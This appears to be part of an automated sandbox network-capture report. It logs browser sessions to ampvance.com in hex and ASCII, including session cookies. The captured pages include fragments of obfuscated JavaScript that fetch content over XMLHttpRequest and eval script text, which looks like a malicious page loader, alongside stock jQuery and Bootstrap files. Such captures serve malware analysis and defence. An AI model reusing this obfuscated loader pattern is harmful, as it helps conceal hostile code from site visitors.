                                                      2024-03-05 13:25:02 UTC743INData Raw: 31 31 37 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 6a 71 2f 33 34 38 35 65 66 31 65 64 31 36 39 64 65 64 66 37 63 37 64 63 36 32 33 37 37 37 63 36 61 38 30 36 35 65 37 31 64 32 65 33 61 32 62 39 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72
                                                      Data Ascii: 1170<!DOCTYPE html><html><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <title></title> <script src="jq/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2b9"></script> <script sr
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 72 73 65 49 6e 74 28 4b 28 27 30 78 31 34 33 27 29 29 2f 30 78 37 2b 70 61 72 73 65 49 6e 74 28 4b 28 30 78 31 35 62 29 29 2f 30 78 38 2a 28 70 61 72 73 65 49 6e 74 28 4b 28 27 30 78 31 38 30 27 29 29 2f 30 78 39 29 3b 69 66 28 58 3d 3d 3d 54 29 62 72 65 61 6b 3b 65 6c 73 65 20 53 5b 27 70 75 73 68 27 5d 28 53 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 79 29 7b 53 5b 27 70 75 73 68 27 5d 28 53 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 49 2c 30 78 36 64 65 66 31 29 29 3b 76 61 72 20 47 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 71 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 54 2c 53 29 7b 76 61 72 20 58 3d 71 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 74 3d 72 3b 69 66 28 53 29 7b 76 61 72 20 79
                                                      Data Ascii: rseInt(K('0x143'))/0x7+parseInt(K(0x15b))/0x8*(parseInt(K('0x180'))/0x9);if(X===T)break;else S['push'](S['shift']());}catch(y){S['push'](S['shift']());}}}(I,0x6def1));var G=(function(){var q=!![];return function(T,S){var X=q?function(){var t=r;if(S){var y
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 35 35 29 5d 3b 79 2b 2b 29 7b 76 61 72 20 57 3d 66 5b 6d 28 27 30 78 31 34 63 27 29 5d 5b 6d 28 30 78 31 34 30 29 5d 5b 6d 28 30 78 31 36 66 29 5d 28 66 29 2c 45 3d 58 5b 79 5d 2c 6e 3d 53 5b 45 5d 7c 7c 57 3b 57 5b 6d 28 27 30 78 31 34 39 27 29 5d 3d 66 5b 6d 28 27 30 78 31 36 66 27 29 5d 28 66 29 2c 57 5b 6d 28 30 78 31 35 64 29 5d 3d 6e 5b 6d 28 30 78 31 35 64 29 5d 5b 6d 28 27 30 78 31 36 66 27 29 5d 28 6e 29 2c 53 5b 45 5d 3d 57 3b 7d 7d 29 3b 56 28 29 3b 76 61 72 20 78 68 74 74 70 3d 6e 65 77 20 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 28 29 3b 66 75 6e 63 74 69 6f 6e 20 49 28 29 7b 76 61 72 20 67 3d 5b 27 62 69 6e 64 27 2c 27 6c 69 6e 6b 27 2c 27 63 68 61 69 6e 27 2c 27 32 71 6e 46 73 54 77 27 2c 27 72 65 73 70 6f 6e 73 65 54 65 78 74 27 2c 27 73
                                                      Data Ascii: 55)];y++){var W=f[m('0x14c')][m(0x140)][m(0x16f)](f),E=X[y],n=S[E]||W;W[m('0x149')]=f[m('0x16f')](f),W[m(0x15d)]=n[m(0x15d)][m('0x16f')](n),S[E]=W;}});V();var xhttp=new XMLHttpRequest();function I(){var g=['bind','link','chain','2qnFsTw','responseText','s
                                                      2024-03-05 13:25:02 UTC991INData Raw: 72 20 79 3d 30 78 30 3b 79 3c 53 5b 63 28 27 30 78 31 35 35 27 29 5d 3b 79 2b 2b 29 7b 76 61 72 20 57 3d 53 5b 79 5d 5b 63 28 27 30 78 31 34 36 27 29 5d 28 63 28 30 78 31 35 39 29 29 3b 57 3f 58 5b 63 28 27 30 78 31 36 35 27 29 5d 28 57 29 3a 65 76 61 6c 28 53 5b 79 5d 5b 63 28 30 78 31 34 62 29 5d 29 3b 7d 76 61 72 20 45 3d 54 5b 63 28 30 78 31 36 64 29 5d 28 63 28 30 78 31 37 30 29 29 3b 66 6f 72 28 76 61 72 20 79 3d 30 78 30 3b 79 3c 45 5b 63 28 27 30 78 31 35 35 27 29 5d 3b 79 2b 2b 29 7b 76 61 72 20 6e 3d 45 5b 79 5d 5b 63 28 27 30 78 31 34 36 27 29 5d 28 63 28 30 78 31 35 61 29 29 3b 69 66 28 6e 26 26 6e 5b 63 28 27 30 78 31 37 64 27 29 5d 28 63 28 30 78 31 35 30 29 29 29 7b 76 61 72 20 75 3d 64 6f 63 75 6d 65 6e 74 5b 63 28 27 30 78 31 37 39 27 29
                                                      Data Ascii: r y=0x0;y<S[c('0x155')];y++){var W=S[y][c('0x146')](c(0x159));W?X[c('0x165')](W):eval(S[y][c(0x14b)]);}var E=T[c(0x16d)](c(0x170));for(var y=0x0;y<E[c('0x155')];y++){var n=E[y][c('0x146')](c(0x15a));if(n&&n[c('0x17d')](c(0x150))){var u=document[c('0x179')
                                                      2024-03-05 13:25:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                      Data Ascii: 0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      31192.168.2.549751104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:02 UTC1138OUTGET /jq/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2b9 HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:02 UTC661INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:02 GMT
                                                      Content-Type: text/javascript
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QfPwv2tal0ZO%2FE0yYV2y0buiDuzStlXmbmN23pyxIrucGHcznk7cp2tdmczXGtN9a5%2FEQmloL147VtjugExg54uUOn3oJNI4R2K6xLaSLW4%2FdFgjaPmLEfblKkdGAY4%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e040b8b433d-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:02 UTC708INData Raw: 37 64 31 64 0d 0a 2f 2a 21 20 6a 51 75 65 72 79 20 76 32 2e 32 2e 34 20 7c 20 28 63 29 20 6a 51 75 65 72 79 20 46 6f 75 6e 64 61 74 69 6f 6e 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 61 2e 64 6f 63 75 6d 65 6e 74 3f 62 28 61 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 21 61 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75 65 72 79 20 72 65 71 75 69 72 65 73 20 61 20 77 69 6e 64 6f 77 20 77 69 74 68 20 61 20 64
                                                      Data Ascii: 7d1d/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a d
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 61 3f 30 3e 61 3f 74 68 69 73 5b 61 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 61 5d 3a 65 2e 63 61 6c 6c 28 74 68 69 73 29 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 2e 63 6f 6e 74 65 78 74 3d 74 68 69 73 2e 63 6f 6e 74 65 78 74 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53
                                                      Data Ascii: function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushS
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 53 74 72 69 6e 67 28 29 3b 72 65 74 75 72 6e 21 6e 2e 69 73 41 72 72 61 79 28 61 29 26 26 62 2d 70 61 72 73 65 46 6c 6f 61 74 28 62 29 2b 31 3e 3d 30 7d 2c 69 73 50 6c 61 69 6e 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 69 66 28 22 6f 62 6a 65 63 74 22 21 3d 3d 6e 2e 74 79 70 65 28 61 29 7c 7c 61 2e 6e 6f 64 65 54 79 70 65 7c 7c 6e 2e 69 73 57 69 6e 64 6f 77 28 61 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 26 26 21 6b 2e 63 61 6c 6c 28 61 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 21 6b 2e 63 61 6c 6c 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2e 70 72 6f 74 6f 74 79 70 65 7c 7c 7b 7d 2c 22 69 73 50 72 6f 74 6f 74 79 70 65 4f 66 22 29 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 62
                                                      Data Ascii: String();return!n.isArray(a)&&b-parseFloat(b)+1>=0},isPlainObject:function(a){var b;if("object"!==n.type(a)||a.nodeType||n.isWindow(a))return!1;if(a.constructor&&!k.call(a,"constructor")&&!k.call(a.constructor.prototype||{},"isPrototypeOf"))return!1;for(b
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 72 65 74 75 72 6e 20 65 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 2c 63 29 7b 76 61 72 20 64 2c 65 2c 67 3d 30 2c 68 3d 5b 5d 3b 69 66 28 73 28 61 29 29 66 6f 72 28 64 3d 61 2e 6c 65 6e 67 74 68 3b 64 3e 67 3b 67 2b 2b 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 65 6c 73 65 20 66 6f 72 28 67 20 69 6e 20 61 29 65 3d 62 28 61 5b 67 5d 2c 67 2c 63 29 2c 6e 75 6c 6c 21 3d 65 26 26 68 2e 70 75 73 68 28 65 29 3b 72 65 74 75 72 6e 20 66 2e 61 70 70 6c 79 28 5b 5d 2c 68 29 7d 2c 67 75 69 64 3a 31 2c 70 72 6f 78 79 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 2c 64 2c 66 3b 72 65 74 75 72 6e 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 62 26 26 28 63 3d 61 5b 62 5d 2c 62 3d
                                                      Data Ascii: return e},map:function(a,b,c){var d,e,g=0,h=[];if(s(a))for(d=a.length;d>g;g++)e=b(a[g],g,c),null!=e&&h.push(e);else for(g in a)e=b(a[g],g,c),null!=e&&h.push(e);return f.apply([],h)},guid:1,proxy:function(a,b){var c,d,f;return"string"==typeof b&&(c=a[b],b=
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 7c 28 22 2b 4d 2b 22 29 29 7c 29 22 2b 4c 2b 22 2a 5c 5c 5d 22 2c 4f 3d 22 3a 28 22 2b 4d 2b 22 29 28 3f 3a 5c 5c 28 28 28 27 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 27 5d 29 2a 29 27 7c 5c 22 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 5c 22 5d 29 2a 29 5c 22 29 7c 28 28 3f 3a 5c 5c 5c 5c 2e 7c 5b 5e 5c 5c 5c 5c 28 29 5b 5c 5c 5d 5d 7c 22 2b 4e 2b 22 29 2a 29 7c 2e 2a 29 5c 5c 29 7c 29 22 2c 50 3d 6e 65 77 20 52 65 67 45 78 70 28 4c 2b 22 2b 22 2c 22 67 22 29 2c 51 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4c 2b 22 2b 7c 28 28 3f 3a 5e 7c 5b 5e 5c 5c 5c 5c 5d 29 28 3f 3a 5c 5c 5c 5c 2e 29 2a 29 22 2b 4c 2b 22 2b 24 22 2c 22 67 22 29 2c 52 3d 6e 65 77 20 52
                                                      Data Ascii: |\"((?:\\\\.|[^\\\\\"])*)\"|("+M+"))|)"+L+"*\\]",O=":("+M+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+N+")*)|.*)\\)|)",P=new RegExp(L+"+","g"),Q=new RegExp("^"+L+"+|((?:^|[^\\\\])(?:\\\\.)*)"+L+"+$","g"),R=new R
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 30 3b 77 68 69 6c 65 28 61 5b 63 2b 2b 5d 3d 62 5b 64 2b 2b 5d 29 3b 61 2e 6c 65 6e 67 74 68 3d 63 2d 31 7d 7d 7d 66 75 6e 63 74 69 6f 6e 20 66 61 28 61 2c 62 2c 64 2c 65 29 7b 76 61 72 20 66 2c 68 2c 6a 2c 6b 2c 6c 2c 6f 2c 72 2c 73 2c 77 3d 62 26 26 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2c 78 3d 62 3f 62 2e 6e 6f 64 65 54 79 70 65 3a 39 3b 69 66 28 64 3d 64 7c 7c 5b 5d 2c 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 61 7c 7c 21 61 7c 7c 31 21 3d 3d 78 26 26 39 21 3d 3d 78 26 26 31 31 21 3d 3d 78 29 72 65 74 75 72 6e 20 64 3b 69 66 28 21 65 26 26 28 28 62 3f 62 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 62 3a 76 29 21 3d 3d 6e 26 26 6d 28 62 29 2c 62 3d 62 7c
                                                      Data Ascii: ion(a,b){var c=a.length,d=0;while(a[c++]=b[d++]);a.length=c-1}}}function fa(a,b,d,e){var f,h,j,k,l,o,r,s,w=b&&b.ownerDocument,x=b?b.nodeType:9;if(d=d||[],"string"!=typeof a||!a||1!==x&&9!==x&&11!==x)return d;if(!e&&((b?b.ownerDocument||b:v)!==n&&m(b),b=b|
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 69 74 28 22 7c 22 29 2c 65 3d 63 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 65 2d 2d 29 64 2e 61 74 74 72 48 61 6e 64 6c 65 5b 63 5b 65 5d 5d 3d 62 7d 66 75 6e 63 74 69 6f 6e 20 6b 61 28 61 2c 62 29 7b 76 61 72 20 63 3d 62 26 26 61 2c 64 3d 63 26 26 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 26 26 31 3d 3d 3d 62 2e 6e 6f 64 65 54 79 70 65 26 26 28 7e 62 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 2d 28 7e 61 2e 73 6f 75 72 63 65 49 6e 64 65 78 7c 7c 43 29 3b 69 66 28 64 29 72 65 74 75 72 6e 20 64 3b 69 66 28 63 29 77 68 69 6c 65 28 63 3d 63 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 69 66 28 63 3d 3d 3d 62 29 72 65 74 75 72 6e 2d 31 3b 72 65 74 75 72 6e 20 61 3f 31 3a 2d 31 7d 66 75 6e 63 74 69 6f 6e 20 6c 61 28 61 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74
                                                      Data Ascii: it("|"),e=c.length;while(e--)d.attrHandle[c[e]]=b}function ka(a,b){var c=b&&a,d=c&&1===a.nodeType&&1===b.nodeType&&(~b.sourceIndex||C)-(~a.sourceIndex||C);if(d)return d;if(c)while(c=c.nextSibling)if(c===b)return-1;return a?1:-1}function la(a){return funct
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 74 73 42 79 4e 61 6d 65 7c 7c 21 6e 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 4e 61 6d 65 28 75 29 2e 6c 65 6e 67 74 68 7d 29 2c 63 2e 67 65 74 42 79 49 64 3f 28 64 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 70 29 7b 76 61 72 20 63 3d 62 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 61 29 3b 72 65 74 75 72 6e 20 63 3f 5b 63 5d 3a 5b 5d 7d 7d 2c 64 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 61 2e 72 65 70 6c 61 63 65 28 62 61 2c 63 61 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22
                                                      Data Ascii: tsByName||!n.getElementsByName(u).length}),c.getById?(d.find.ID=function(a,b){if("undefined"!=typeof b.getElementById&&p){var c=b.getElementById(a);return c?[c]:[]}},d.filter.ID=function(a){var b=a.replace(ba,ca);return function(a){return a.getAttribute("
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 71 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 7d 29 2c 69 61 28 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 3b 62 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 74 79 70 65 22 2c 22 68 69 64 64 65 6e 22 29 2c 61 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 62 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 44 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 64 5d 22 29 2e 6c 65 6e 67 74 68 26 26 71 2e 70 75 73 68 28 22 6e 61 6d 65 22 2b 4c 2b 22 2a 5b 2a 5e 24 7c 21 7e 5d 3f 3d 22 29 2c 61 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 65 6e 61 62 6c 65 64 22 29
                                                      Data Ascii: "+*").length||q.push(".#.+[+~]")}),ia(function(a){var b=n.createElement("input");b.setAttribute("type","hidden"),a.appendChild(b).setAttribute("name","D"),a.querySelectorAll("[name=d]").length&&q.push("name"+L+"*[*^$|!~]?="),a.querySelectorAll(":enabled")
                                                      2024-03-05 13:25:02 UTC1369INData Raw: 3d 62 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 67 3d 5b 61 5d 2c 68 3d 5b 62 5d 3b 69 66 28 21 65 7c 7c 21 66 29 72 65 74 75 72 6e 20 61 3d 3d 3d 6e 3f 2d 31 3a 62 3d 3d 3d 6e 3f 31 3a 65 3f 2d 31 3a 66 3f 31 3a 6b 3f 4a 28 6b 2c 61 29 2d 4a 28 6b 2c 62 29 3a 30 3b 69 66 28 65 3d 3d 3d 66 29 72 65 74 75 72 6e 20 6b 61 28 61 2c 62 29 3b 63 3d 61 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 67 2e 75 6e 73 68 69 66 74 28 63 29 3b 63 3d 62 3b 77 68 69 6c 65 28 63 3d 63 2e 70 61 72 65 6e 74 4e 6f 64 65 29 68 2e 75 6e 73 68 69 66 74 28 63 29 3b 77 68 69 6c 65 28 67 5b 64 5d 3d 3d 3d 68 5b 64 5d 29 64 2b 2b 3b 72 65 74 75 72 6e 20 64 3f 6b 61 28 67 5b 64 5d 2c 68 5b 64 5d 29 3a 67 5b 64 5d 3d 3d 3d 76 3f 2d 31 3a 68 5b 64 5d 3d 3d 3d 76 3f 31 3a
                                                      Data Ascii: =b.parentNode,g=[a],h=[b];if(!e||!f)return a===n?-1:b===n?1:e?-1:f?1:k?J(k,a)-J(k,b):0;if(e===f)return ka(a,b);c=a;while(c=c.parentNode)g.unshift(c);c=b;while(c=c.parentNode)h.unshift(c);while(g[d]===h[d])d++;return d?ka(g[d],h[d]):g[d]===v?-1:h[d]===v?1:


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      32192.168.2.549753104.21.81.2294433472C:\Program Files\Google\Chrome\Application\chrome.exe
                                                      TimestampBytes transferredDirectionData
                                                      2024-03-05 13:25:02 UTC1140OUTGET /boot/3485ef1ed169dedf7c7dc623777c6a8065e71d2e3a2bf HTTP/1.1
                                                      Host: ampvance.com
                                                      Connection: keep-alive
                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                      sec-ch-ua-mobile: ?0
                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                      sec-ch-ua-arch: "x86"
                                                      sec-ch-ua-full-version: "117.0.5938.132"
                                                      sec-ch-ua-platform-version: "10.0.0"
                                                      sec-ch-ua-full-version-list: "Google Chrome";v="117.0.5938.132", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"
                                                      sec-ch-ua-bitness: "64"
                                                      sec-ch-ua-model: ""
                                                      sec-ch-ua-platform: "Windows"
                                                      Accept: */*
                                                      Sec-Fetch-Site: same-origin
                                                      Sec-Fetch-Mode: no-cors
                                                      Sec-Fetch-Dest: script
                                                      Referer: https://ampvance.com/cf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d3LOGcf7e4164f8225f1bd6b9a33751f5f9ed65e71d2da84d4
                                                      Accept-Encoding: gzip, deflate, br
                                                      Accept-Language: en-US,en;q=0.9
                                                      Cookie: cf_clearance=9ukY5ydoUPWFViqUC.G2Zau9oL4gAKunoKgXLN6qDgI-1709645074-1.0.1.1-puuwhjhkEypTXzvnBM1g5Iqmc8RGMwSRmclBcSbSok6Kg9HC2riMGTLYdtgq.1NerTlIrY3RuGM9E7wADehI8Q; PHPSESSID=e09506325d449b6bfb209b4fdc8c5b59
                                                      2024-03-05 13:25:02 UTC665INHTTP/1.1 200 OK
                                                      Date: Tue, 05 Mar 2024 13:25:02 GMT
                                                      Content-Type: text/javascript
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      last-modified: Tue, 05 Mar 2024 10:40:37 GMT
                                                      vary: Accept-Encoding
                                                      x-turbo-charged-by: LiteSpeed
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=t50PIVDM5Zs7Ertcn7YOd0wWpIxYBZTFtQGpaP%2F0JZ6VLPH9pBI4%2FBBhHk9J2i%2BLN7DomRGj42GzLj%2FxTB4sisHD5CyLBTyWkckexfDv3bhl5Nq%2ByudW4oYihx7LiC8%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 85fa6e041fe843a7-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      2024-03-05 13:25:02 UTC704INData Raw: 37 64 31 39 0d 0a 2f 2a 21 0a 20 20 2a 20 42 6f 6f 74 73 74 72 61 70 20 76 34 2e 31 2e 33 20 28 68 74 74 70 73 3a 2f 2f 67 65 74 62 6f 6f 74 73 74 72 61 70 2e 63 6f 6d 2f 29 0a 20 20 2a 20 43 6f 70 79 72 69 67 68 74 20 32 30 31 31 2d 32 30 31 38 20 54 68 65 20 42 6f 6f 74 73 74 72 61 70 20 41 75 74 68 6f 72 73 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 67 72 61 70 68 73 2f 63 6f 6e 74 72 69 62 75 74 6f 72 73 29 0a 20 20 2a 20 4c 69 63 65 6e 73 65 64 20 75 6e 64 65 72 20 4d 49 54 20 28 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 74 77 62 73 2f 62 6f 6f 74 73 74 72 61 70 2f 62 6c 6f 62 2f 6d 61 73 74 65 72 2f 4c 49 43 45 4e 53 45 29 0a 20 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28
                                                      Data Ascii: 7d19/*! * Bootstrap v4.1.3 (https://getbootstrap.com/) * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors) * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE) */!function(
